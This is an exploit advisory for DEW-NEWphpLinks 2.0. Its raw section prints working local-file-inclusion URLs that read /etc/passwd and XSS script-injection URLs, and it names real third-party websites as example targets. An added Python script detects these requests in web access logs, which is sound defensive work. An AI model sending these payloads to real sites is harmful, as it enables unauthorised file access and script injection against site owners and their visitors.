Vendor: DEW-NEWphpLinks
By: d3v1l [Avram Marius]
CVSS: 7,5 (HIGH)
Type: LFI/XSS
CWE: 22, 79
Product Name: DEW-NEWphpLinks
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
Year: 2009

DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities

DEW-NEWphpLinks 2.0 is vulnerable to Local File Inclusion (CWE-22) through the show parameter of index.php and to Cross-Site Scripting (CWE-79) through the PID parameter of index.php. An attacker can exploit these flaws to gain access to sensitive information and to execute malicious scripts in the victim's browser.

Mitigation:

Update to the latest version of DEW-NEWphpLinks 2.0

Exploit-DB raw data:

[~]------------------------------------------------------------------------------------------------
[~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
[~]
[~] http://www.dew-code.com
[~]  
[~] 
[~] -----------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 25.04.2009
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members(https://security-shell.ws/forum.php)-(http://security-sh3ll.blogspot.com)
[~]
[~] milw0rm staff
[~]-------------------------------------------------------------------------------------------------
[~] Exploit :- LFI - index.php?show=
[~]
[~] http://site.com/index.php?show=../../../../../../etc/passwd%00
[~]  
[~] Ex :-
[~]
[~] http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00  
[~] http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00
[~]-------------------------------------------------------------------------------------------------
[~] XSS on search module works fine on ALL versions
[~]  
[~] Ex :- XSS - index.php?PID=
[~] 
[~] http://directory.custom-printed-t-shirts.com/index.php?PID="><script>alert("test")</script>
[~] http://www.customprintedsweatshirts.com/links/index.php?PID="><script>alert("test")</script>
[~]-------------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-27]
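
A detection sketch for the two request shapes in the advisory above, as an added example that is not part of the original advisory or the vendor's code: it scans web access-log lines for traversal or null-byte values in show and for markup characters in PID on index.php. The log lines are constructed samples, and the function names (fully_decode, classify, scan) are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines; IPs are documentation addresses (RFC 5737).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2009:10:01:02 +0000] "GET /index.php?show=../../../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '192.0.2.11 - - [27/Apr/2009:10:01:09 +0000] "GET /links/index.php?PID=%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E HTTP/1.1" 200 4410',
    '192.0.2.12 - - [27/Apr/2009:10:02:30 +0000] "GET /index.php?show=%252e%252e%252fconfig HTTP/1.1" 200 811',
    '192.0.2.13 - - [27/Apr/2009:10:03:00 +0000] "GET /index.php?PID=12&show=add HTTP/1.1" 200 6021',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # characters that let a value break out of an HTML attribute

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a sorted list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m or not urlsplit(m.group(1)).path.endswith("index.php"):
        return []
    findings = set()
    # parse_qs decodes one layer; fully_decode removes any further layers.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    for value in params.get("show", []):
        value = fully_decode(value)
        if "../" in value or "..\\" in value or value.startswith("/"):
            findings.add("LFI:traversal")
        if "\x00" in value:
            findings.add("LFI:null-byte")
    for value in params.get("PID", []):
        if MARKUP_RE.search(fully_decode(value)):
            findings.add("XSS:markup")
    return sorted(findings)

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {i: f for i, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```
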